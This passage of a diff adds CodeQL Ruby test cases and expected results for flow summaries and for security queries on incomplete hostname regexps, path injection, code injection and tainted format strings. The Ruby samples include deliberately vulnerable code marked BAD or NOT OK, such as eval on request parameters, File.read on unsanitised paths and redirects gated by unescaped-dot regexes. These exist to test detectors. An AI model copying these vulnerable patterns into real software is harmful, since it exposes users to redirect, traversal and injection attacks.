  c = s.getToken(_) and
@@ -64,6 +67,51 @@ private class SummarizedCallableApplyLambda extends SummarizedCallable {
  }
 }

+private class StepsFromModel extends ModelInput::SummaryModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        ";;Member[Foo].Method[firstArg];Argument[0];ReturnValue;taint",
+        ";;Member[Foo].Method[secondArg];Argument[1];ReturnValue;taint",
+        ";;Member[Foo].Method[onlyWithoutBlock].WithoutBlock;Argument[0];ReturnValue;taint",
+        ";;Member[Foo].Method[onlyWithBlock].WithBlock;Argument[0];ReturnValue;taint",
+        ";;Member[Foo].Method[blockArg].BlockArgument.Parameter[0].Method[preserveTaint];Argument[0];ReturnValue;taint",
+        ";any;Method[matchedByName];Argument[0];ReturnValue;taint",
+        ";any;Method[matchedByNameRcv];Receiver;ReturnValue;taint",
+      ]
+  }
+}
+
+private class TypeFromModel extends ModelInput::TypeModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        "test;FooOrBar;;;Member[Foo].Instance", //
+        "test;FooOrBar;;;Member[Bar].Instance", //
+        "test;FooOrBar;test;FooOrBar;Method[next].ReturnValue",
+      ]
+  }
+}
+
+private class InvalidTypeModel extends ModelInput::TypeModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        "test;TooManyColumns;;;Member[Foo].Instance;too;many;columns", //
+        "test;TooFewColumns", //
+        "test;X;test;Y;Method[foo].Arg[0]", //
+        "test;X;test;Y;Method[foo].Argument[0-1]", //
+        "test;X;test;Y;Method[foo].Argument[*]", //
+        "test;X;test;Y;Method[foo].Argument", //
+        "test;X;test;Y;Method[foo].Member", //
+      ]
+  }
+}
+
+private class SinkFromModel extends ModelInput::SinkModelCsv {
+  override predicate row(string row) { row = "test;FooOrBar;Method[method].Argument[0];test-sink" }
+}
+
 class Conf extends TaintTracking::Configuration {
  Conf() { this = "FlowSummaries" }

@@ -76,6 +124,8 @@ class Conf extends TaintTracking::Configuration {
      mc.getMethodName() = "sink" and
      mc.getAnArgument() = sink.asExpr().getExpr()
    )
+    or
+    sink = ModelOutput::getASinkNode("test-sink").getARhs()
  }
 }

--- a/ruby/ql/test/library-tests/dataflow/summaries/summaries.rb
+++ b/ruby/ql/test/library-tests/dataflow/summaries/summaries.rb
@@ -16,3 +16,34 @@ my_lambda = -> (x) {
 tainted3 = apply_lambda(my_lambda, tainted)

 sink(tainted3)
+
+tainted4 = Foo.firstArg(tainted)
+sink(tainted4)
+
+notTainted = Foo.firstArg(nil, tainted))
+sink(notTainted)
+
+tainted5 = Foo.secondArg(nil, tainted)
+sink(tainted5)
+
+sink(Foo.onlyWithBlock(tainted))
+sink(Foo.onlyWithBlock(tainted) do |x| end)
+sink(Foo.onlyWithoutBlock(tainted))
+sink(Foo.onlyWithoutBlock(tainted) do |x| end)
+
+Foo.new.method(tainted)
+Bar.new.method(tainted)
+Bar.new.next.method(tainted)
+Bar.new.next.next.next.next.method(tainted)
+
+def userDefinedFunction(x, y)
+  t = "taint"
+  sink(x.matchedByName(t))
+  sink(y.matchedByName(t))
+  sink(x.unmatchedName(t))
+  sink(t.matchedByNameRcv())
+end
+
+Foo.blockArg do |x|
+  sink(x.preserveTaint("taint"))
+end
--- a/ruby/ql/test/library-tests/regexp/regexp.expected
+++ b/ruby/ql/test/library-tests/regexp/regexp.expected
@@ -6,11 +6,8 @@ groupNumber
 | regexp.rb:46:2:46:6 | (foo) | 1 |
 | regexp.rb:47:4:47:8 | (o\|b) | 1 |
 | regexp.rb:48:2:48:9 | (a\|b\|cd) | 1 |
-| regexp.rb:49:2:49:7 | (?::+) | 1 |
-| regexp.rb:52:2:52:11 | (?<id>\\w+) | 1 |
 | regexp.rb:53:2:53:12 | (?'foo'fo+) | 1 |
 | regexp.rb:56:2:56:5 | (a+) | 1 |
-| regexp.rb:57:2:57:11 | (?<qux>q+) | 1 |
 term
 | regexp.rb:5:2:5:4 | abc | RegExpConstant,RegExpNormalChar |
 | regexp.rb:8:2:8:2 | a | RegExpConstant,RegExpNormalChar |
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.expected
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.expected
@@ -0,0 +1,28 @@
+| hosttest.rb:1:18:1:41 | (www\|beta).example.com\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | hosttest.rb:1:17:1:42 | /(www\|beta).example.com\\// | here |
+| hosttest.rb:2:33:2:55 | (www\|beta).example.com/ | This regular expression has an unescaped '.' before 'example.com/', so it might match more hosts than expected. | hosttest.rb:2:32:2:56 | "(www\|beta).example.com/" | here |
+| hosttest.rb:3:29:3:51 | (www\|beta).example.com/ | This regular expression has an unescaped '.' before 'example.com/', so it might match more hosts than expected. | hosttest.rb:3:28:3:52 | "(www\|beta).example.com/" | here |
+| tst-IncompleteHostnameRegExp.rb:3:3:3:28 | ^http:\\/\\/test.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:3:2:3:29 | /^http:\\/\\/test.example.com/ | here |
+| tst-IncompleteHostnameRegExp.rb:5:3:5:28 | ^http:\\/\\/test.example.net | This regular expression has an unescaped '.' before 'example.net', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:5:2:5:29 | /^http:\\/\\/test.example.net/ | here |
+| tst-IncompleteHostnameRegExp.rb:6:3:6:42 | ^http:\\/\\/test.(example-a\|example-b).com | This regular expression has an unescaped '.' before '(example-a\|example-b).com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:6:2:6:43 | /^http:\\/\\/test.(example-a\|exa.../ | here |
+| tst-IncompleteHostnameRegExp.rb:7:3:7:30 | ^http:\\/\\/(.+).example.com\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:7:2:7:31 | /^http:\\/\\/(.+).example.com\\// | here |
+| tst-IncompleteHostnameRegExp.rb:7:3:7:30 | ^http:\\/\\/(.+).example.com\\/ | This regular expression has an unrestricted wildcard '.+' which may cause 'example.com' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:7:2:7:31 | /^http:\\/\\/(.+).example.com\\// | here |
+| tst-IncompleteHostnameRegExp.rb:9:3:9:39 | ^http:\\/\\/(?:.+)\\.test\\.example.com\\/ | This regular expression has an unrestricted wildcard '.+' which may cause 'example.com' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:9:2:9:40 | /^http:\\/\\/(?:.+)\\.test\\.examp.../ | here |
+| tst-IncompleteHostnameRegExp.rb:10:3:10:36 | ^http:\\/\\/test.example.com\\/(?:.*) | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:10:2:10:37 | /^http:\\/\\/test.example.com\\/(.../ | here |
+| tst-IncompleteHostnameRegExp.rb:11:14:11:37 | ^http://test.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:11:13:11:38 | "^http://test.example.com" | here |
+| tst-IncompleteHostnameRegExp.rb:12:15:12:38 | ^http://test.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:12:14:12:39 | "^http://test.example.com" | here |
+| tst-IncompleteHostnameRegExp.rb:15:23:15:46 | ^http://test.example.com | This string, which is used as a regular expression $@, has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:15:13:15:50 | call to id | here |
+| tst-IncompleteHostnameRegExp.rb:17:14:17:30 | test.example.com$ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:17:13:17:31 | `test.example.com$` | here |
+| tst-IncompleteHostnameRegExp.rb:19:14:19:30 | ^test.example.com | This string, which is used as a regular expression $@, has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:20:13:20:26 | "#{...}$" | here |
+| tst-IncompleteHostnameRegExp.rb:20:14:20:31 | ^test.example.com$ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:20:13:20:26 | "#{...}$" | here |
+| tst-IncompleteHostnameRegExp.rb:37:3:37:53 | ^(https?:)?\\/\\/((service\|www).)?example.com(?=$\|\\/) | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:37:2:37:54 | /^(https?:)?\\/\\/((service\|www).../ | here |
+| tst-IncompleteHostnameRegExp.rb:38:3:38:43 | ^(http\|https):\\/\\/www.example.com\\/p\\/f\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:38:2:38:44 | /^(http\|https):\\/\\/www.example.../ | here |
+| tst-IncompleteHostnameRegExp.rb:39:5:39:30 | http:\\/\\/sub.example.com\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:39:2:39:33 | /^(http:\\/\\/sub.example.com\\/)/ | here |
+| tst-IncompleteHostnameRegExp.rb:40:3:40:29 | ^https?:\\/\\/api.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:40:2:40:30 | /^https?:\\/\\/api.example.com/ | here |
+| tst-IncompleteHostnameRegExp.rb:41:42:41:68 | ^https?://.+\\.example\\.com/ | This string, which is used as a regular expression $@, has an unrestricted wildcard '.+' which may cause 'example\\.com/' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:41:13:41:71 | ... + ... | here |
+| tst-IncompleteHostnameRegExp.rb:43:3:43:32 | ^https:\\/\\/[a-z]*.example.com$ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:43:2:43:33 | /^https:\\/\\/[a-z]*.example.com$/ | here |
+| tst-IncompleteHostnameRegExp.rb:44:40:44:53 | .+.example.net | This regular expression has an unescaped '.' before 'example.net', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:44:17:44:109 | "^protos?://(localhost\|.+.exam..." | here |
+| tst-IncompleteHostnameRegExp.rb:44:55:44:70 | .+.example-a.com | This regular expression has an unescaped '.' before 'example-a.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:44:17:44:109 | "^protos?://(localhost\|.+.exam..." | here |
+| tst-IncompleteHostnameRegExp.rb:44:72:44:87 | .+.example-b.com | This regular expression has an unescaped '.' before 'example-b.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:44:17:44:109 | "^protos?://(localhost\|.+.exam..." | here |
+| tst-IncompleteHostnameRegExp.rb:48:42:48:67 | ^https?://.+.example\\.com/ | This string, which is used as a regular expression $@, has an unescaped '.' before 'example\\.com/', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:48:13:48:69 | ... + ... | here |
+| tst-IncompleteHostnameRegExp.rb:48:42:48:67 | ^https?://.+.example\\.com/ | This string, which is used as a regular expression $@, has an unrestricted wildcard '.+' which may cause 'example\\.com/' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:48:13:48:69 | ... + ... | here |
+| tst-IncompleteHostnameRegExp.rb:59:5:59:20 | foo.example\\.com | This regular expression has an unescaped '.' before 'example\\.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:59:2:59:32 | /^(foo.example\\.com\|whatever)$/ | here |
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref
@@ -0,0 +1 @@
+queries/security/cwe-020/IncompleteHostnameRegExp.ql
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb
@@ -0,0 +1,22 @@
+UNSAFE_REGEX1 = /(www|beta).example.com\//
+UNSAFE_REGEX2 = Regexp.compile("(www|beta).example.com/")
+UNSAFE_REGEX3 = Regexp.new("(www|beta).example.com/")
+SAFE_REGEX = /(www|beta)\.example\.com\//
+
+def unsafe
+    target = params[:target]
+    if UNSAFE_REGEX1.match(target)
+        redirect_to target
+    end
+end
+
+def safe
+    target = params[:target]
+    if SAFE_REGEX.match(target)
+        redirect_to target
+    end
+end
+
+# FP reported in https://github.com/github/codeql/issues/3712
+# This does not define a regex (but could be used by other code to do so)
+escaped = Regexp::escape("https://www.humblebundle.com/home/library")
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb
@@ -0,0 +1,67 @@
+def foo
+	/^http:\/\/example.com/; # OK
+	/^http:\/\/test.example.com/; # NOT OK
+	/^http:\/\/test\.example.com/; # OK
+	/^http:\/\/test.example.net/; # NOT OK
+	/^http:\/\/test.(example-a|example-b).com/; # NOT OK
+	/^http:\/\/(.+).example.com\//; # NOT OK
+	/^http:\/\/(\.+)\.example.com/; # OK
+	/^http:\/\/(?:.+)\.test\.example.com\//; # NOT OK
+	/^http:\/\/test.example.com\/(?:.*)/; # OK
+	Regexp.new("^http://test.example.com"); # NOT OK
+	if (s.match("^http://test.example.com")); end # NOT OK
+
+
+	Regexp.new(id(id(id("^http://test.example.com")))); # NOT OK
+
+	Regexp.new(`test.example.com$`); # NOT OK
+
+	hostname = '^test.example.com'; # NOT OK
+	Regexp.new("#{hostname}$");
+
+	domain = { hostname: 'test.example.com$' }; # NOT OK
+	Regexp.new(domain[:hostname]);
+
+
+
+
+	convert1({ hostname: 'test.example.com$' }); # NOT OK
+
+	domains = [ { hostname: 'test.example.com$' } ];  # NOT OK
+
+
+
+	domains.map{ |d| convert2(d) };
+
+	/^(.+\.(?:example-a|example-b)\.com)\//; # NOT OK
+	/^(https?:)?\/\/((service|www).)?example.com(?=$|\/)/; # NOT OK
+	/^(http|https):\/\/www.example.com\/p\/f\//; # NOT OK
+	/^(http:\/\/sub.example.com\/)/i; # NOT OK
+	/^https?:\/\/api.example.com/; # NOT OK
+	Regexp.new('^http://localhost:8000|' + "^https?://.+\\.example\\.com/"); # NOT OK
+	Regexp.new("^http[s]?:\/\/?sub1\\.sub2\\.example\\.com\/f\/(.+)"); # NOT OK
+	/^https:\/\/[a-z]*.example.com$/; # NOT OK
+	Regexp.compile('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); # NOT OK
+
+	/^(example.dev|example.com)/; # OK
+
+	Regexp.new('^http://localhost:8000|' + "^https?://.+.example\\.com/"); # NOT OK
+
+	primary = 'example.com$';
+	Regexp.new('test.' + primary); # NOT OK, but not detected
+
+	Regexp.new('test.' + 'example.com$'); # NOT OK
+
+	Regexp.new('^http://test\.example.com'); # NOT OK
+
+	/^http:\/\/(..|...)\.example\.com\/index\.html/; # OK, wildcards are intentional
+	/^http:\/\/.\.example\.com\/index\.html/; # OK, the wildcard is intentional
+	/^(foo.example\.com|whatever)$/; # kinda OK - one disjunction doesn't even look like a hostname
+end
+def id(e); return e; end
+def convert1(domain)
+	return Regexp.new(domain[:hostname]);
+end
+def convert2(domain)
+	return Regexp.new(domain[:hostname]);
+end
--- a/ruby/ql/test/query-tests/security/cwe-022/PathInjection.expected
+++ b/ruby/ql/test/query-tests/security/cwe-022/PathInjection.expected
@@ -22,6 +22,9 @@ edges
 | tainted_path.rb:47:12:47:63 | call to join :  | tainted_path.rb:48:26:48:29 | path |
 | tainted_path.rb:47:43:47:48 | call to params :  | tainted_path.rb:47:43:47:55 | ...[...] :  |
 | tainted_path.rb:47:43:47:55 | ...[...] :  | tainted_path.rb:47:12:47:63 | call to join :  |
+| tainted_path.rb:59:12:59:53 | call to new :  | tainted_path.rb:60:26:60:29 | path |
+| tainted_path.rb:59:40:59:45 | call to params :  | tainted_path.rb:59:40:59:52 | ...[...] :  |
+| tainted_path.rb:59:40:59:52 | ...[...] :  | tainted_path.rb:59:12:59:53 | call to new :  |
 nodes
 | tainted_path.rb:4:12:4:17 | call to params :  | semmle.label | call to params :  |
 | tainted_path.rb:4:12:4:24 | ...[...] :  | semmle.label | ...[...] :  |
@@ -54,6 +57,10 @@ nodes
 | tainted_path.rb:47:43:47:48 | call to params :  | semmle.label | call to params :  |
 | tainted_path.rb:47:43:47:55 | ...[...] :  | semmle.label | ...[...] :  |
 | tainted_path.rb:48:26:48:29 | path | semmle.label | path |
+| tainted_path.rb:59:12:59:53 | call to new :  | semmle.label | call to new :  |
+| tainted_path.rb:59:40:59:45 | call to params :  | semmle.label | call to params :  |
+| tainted_path.rb:59:40:59:52 | ...[...] :  | semmle.label | ...[...] :  |
+| tainted_path.rb:60:26:60:29 | path | semmle.label | path |
 subpaths
 #select
 | tainted_path.rb:5:26:5:29 | path | tainted_path.rb:4:12:4:17 | call to params :  | tainted_path.rb:5:26:5:29 | path | This path depends on $@. | tainted_path.rb:4:12:4:17 | call to params | a user-provided value |
@@ -64,3 +71,4 @@ subpaths
 | tainted_path.rb:35:26:35:29 | path | tainted_path.rb:34:29:34:34 | call to params :  | tainted_path.rb:35:26:35:29 | path | This path depends on $@. | tainted_path.rb:34:29:34:34 | call to params | a user-provided value |
 | tainted_path.rb:41:26:41:29 | path | tainted_path.rb:40:26:40:31 | call to params :  | tainted_path.rb:41:26:41:29 | path | This path depends on $@. | tainted_path.rb:40:26:40:31 | call to params | a user-provided value |
 | tainted_path.rb:48:26:48:29 | path | tainted_path.rb:47:43:47:48 | call to params :  | tainted_path.rb:48:26:48:29 | path | This path depends on $@. | tainted_path.rb:47:43:47:48 | call to params | a user-provided value |
+| tainted_path.rb:60:26:60:29 | path | tainted_path.rb:59:40:59:45 | call to params :  | tainted_path.rb:60:26:60:29 | path | This path depends on $@. | tainted_path.rb:59:40:59:45 | call to params | a user-provided value |
--- a/ruby/ql/test/query-tests/security/cwe-022/tainted_path.rb
+++ b/ruby/ql/test/query-tests/security/cwe-022/tainted_path.rb
@@ -54,8 +54,14 @@ class FooController < ActionController::Base
    @content = File.read path
  end

-  # GOOD - explicitly sanitized
+  # BAD
  def route9
+    path = ActiveStorage::Filename.new(params[:path])
+    @content = File.read path
+  end
+
+  # GOOD - explicitly sanitized
+  def route10
    path = ActiveStorage::Filename.new(params[:path]).sanitized
    @content = File.read path
  end
--- a/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.expected
+++ b/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.expected
@@ -5,6 +5,8 @@ edges
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:21:21:21:24 | code |
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:27:15:27:18 | code |
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:30:19:30:22 | code |
+| CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:36:24:36:27 | code :  |
+| CodeInjection.rb:36:24:36:27 | code :  | CodeInjection.rb:36:10:36:28 | call to escape |
 nodes
 | CodeInjection.rb:3:12:3:17 | call to params :  | semmle.label | call to params :  |
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | semmle.label | ...[...] :  |
@@ -14,6 +16,8 @@ nodes
 | CodeInjection.rb:21:21:21:24 | code | semmle.label | code |
 | CodeInjection.rb:27:15:27:18 | code | semmle.label | code |
 | CodeInjection.rb:30:19:30:22 | code | semmle.label | code |
+| CodeInjection.rb:36:10:36:28 | call to escape | semmle.label | call to escape |
+| CodeInjection.rb:36:24:36:27 | code :  | semmle.label | code :  |
 subpaths
 #select
 | CodeInjection.rb:6:10:6:13 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:6:10:6:13 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
@@ -22,3 +26,4 @@ subpaths
 | CodeInjection.rb:21:21:21:24 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:21:21:21:24 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
 | CodeInjection.rb:27:15:27:18 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:27:15:27:18 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
 | CodeInjection.rb:30:19:30:22 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:30:19:30:22 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
+| CodeInjection.rb:36:10:36:28 | call to escape | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:36:10:36:28 | call to escape | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
--- a/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.rb
+++ b/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.rb
@@ -31,6 +31,9 @@ class UsersController < ActionController::Base
    
    # GOOD
    Bar.const_get(code)
+
+    # BAD
+    eval(Regexp.escape(code))
  end

  def update
--- a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter.expected
+++ b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter.expected
@@ -11,4 +11,4 @@
 | test.rb:15:6:15:39 | <script[^>]*?>[\\s\\S]*?<\\/script.*> | This regular expression does not match script end tags like </script\\t\\n bar>. |
 | test.rb:17:6:17:40 | <script\\b[^>]*>([\\s\\S]*?)<\\/script> | This regular expression does not match script end tags like </script >. |
 | test.rb:18:6:18:48 | <(?:!--([\\S\|\\s]*?)-->)\|([^\\/\\s>]+)[\\S\\s]*?> | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 1 and comments ending with --!> are matched with capture group 2. |
-| test.rb:19:6:19:147 | <(?:(?:\\/([^>]+)>)\|(?:!--([\\S\|\\s]*?)-->)\|(?:([^\\/\\s>]+)((?:\\s+[\\w\\-:.]+(?:\\s*=\\s*?(?:(?:"[^"]*")\|(?:'[^']*')\|[^\\s"'\\/>]+))?)*)[\\S\\s]*?(\\/?)>)) | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 2 and comments ending with --!> are matched with capture group 1, 3, 4, 5. |
+| test.rb:19:6:19:147 | <(?:(?:\\/([^>]+)>)\|(?:!--([\\S\|\\s]*?)-->)\|(?:([^\\/\\s>]+)((?:\\s+[\\w\\-:.]+(?:\\s*=\\s*?(?:(?:"[^"]*")\|(?:'[^']*')\|[^\\s"'\\/>]+))?)*)[\\S\\s]*?(\\/?)>)) | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 2 and comments ending with --!> are matched with capture group 3, 4. |
--- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected
+++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected
@@ -0,0 +1,52 @@
+edges
+| tainted_format_string.rb:4:12:4:17 | call to params :  | tainted_format_string.rb:4:12:4:26 | ...[...] |
+| tainted_format_string.rb:5:19:5:24 | call to params :  | tainted_format_string.rb:5:19:5:33 | ...[...] |
+| tainted_format_string.rb:10:23:10:28 | call to params :  | tainted_format_string.rb:10:23:10:37 | ...[...] |
+| tainted_format_string.rb:11:30:11:35 | call to params :  | tainted_format_string.rb:11:30:11:44 | ...[...] |
+| tainted_format_string.rb:18:23:18:28 | call to params :  | tainted_format_string.rb:18:23:18:37 | ...[...] |
+| tainted_format_string.rb:19:30:19:35 | call to params :  | tainted_format_string.rb:19:30:19:44 | ...[...] |
+| tainted_format_string.rb:21:27:21:32 | call to params :  | tainted_format_string.rb:21:27:21:41 | ...[...] |
+| tainted_format_string.rb:22:20:22:25 | call to params :  | tainted_format_string.rb:22:20:22:34 | ...[...] |
+| tainted_format_string.rb:28:19:28:24 | call to params :  | tainted_format_string.rb:28:19:28:33 | ...[...] |
+| tainted_format_string.rb:33:32:33:37 | call to params :  | tainted_format_string.rb:33:32:33:46 | ...[...] :  |
+| tainted_format_string.rb:33:32:33:46 | ...[...] :  | tainted_format_string.rb:33:12:33:46 | ... + ... |
+| tainted_format_string.rb:36:30:36:35 | call to params :  | tainted_format_string.rb:36:30:36:44 | ...[...] :  |
+| tainted_format_string.rb:36:30:36:44 | ...[...] :  | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" |
+nodes
+| tainted_format_string.rb:4:12:4:17 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:4:12:4:26 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:5:19:5:24 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:5:19:5:33 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:10:23:10:28 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:10:23:10:37 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:11:30:11:35 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:11:30:11:44 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:18:23:18:28 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:18:23:18:37 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:19:30:19:35 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:19:30:19:44 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:21:27:21:32 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:21:27:21:41 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:22:20:22:25 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:22:20:22:34 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:28:19:28:24 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:28:19:28:33 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:33:12:33:46 | ... + ... | semmle.label | ... + ... |
+| tainted_format_string.rb:33:32:33:37 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:33:32:33:46 | ...[...] :  | semmle.label | ...[...] :  |
+| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | semmle.label | "A log message: #{...}" |
+| tainted_format_string.rb:36:30:36:35 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:36:30:36:44 | ...[...] :  | semmle.label | ...[...] :  |
+subpaths
+#select
+| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params :  | tainted_format_string.rb:4:12:4:26 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:4:12:4:17 | call to params | User-provided value |
+| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params :  | tainted_format_string.rb:5:19:5:33 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:5:19:5:24 | call to params | User-provided value |
+| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params :  | tainted_format_string.rb:10:23:10:37 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:10:23:10:28 | call to params | User-provided value |
+| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params :  | tainted_format_string.rb:11:30:11:44 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:11:30:11:35 | call to params | User-provided value |
+| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params :  | tainted_format_string.rb:18:23:18:37 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:18:23:18:28 | call to params | User-provided value |
+| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params :  | tainted_format_string.rb:19:30:19:44 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:19:30:19:35 | call to params | User-provided value |
+| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params :  | tainted_format_string.rb:21:27:21:41 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:21:27:21:32 | call to params | User-provided value |
+| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params :  | tainted_format_string.rb:22:20:22:34 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:22:20:22:25 | call to params | User-provided value |
+| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params :  | tainted_format_string.rb:28:19:28:33 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:28:19:28:24 | call to params | User-provided value |
+| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params :  | tainted_format_string.rb:33:12:33:46 | ... + ... | $@ flows here and is used in a format string. | tainted_format_string.rb:33:32:33:37 | call to params | User-provided value |
+| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params :  | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | $@ flows here and is used in a format string. | tainted_format_string.rb:36:30:36:35 | call to params | User-provided value |
--- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref
@@ -0,0 +1 @@
+queries/security/cwe-134/TaintedFormatString.ql
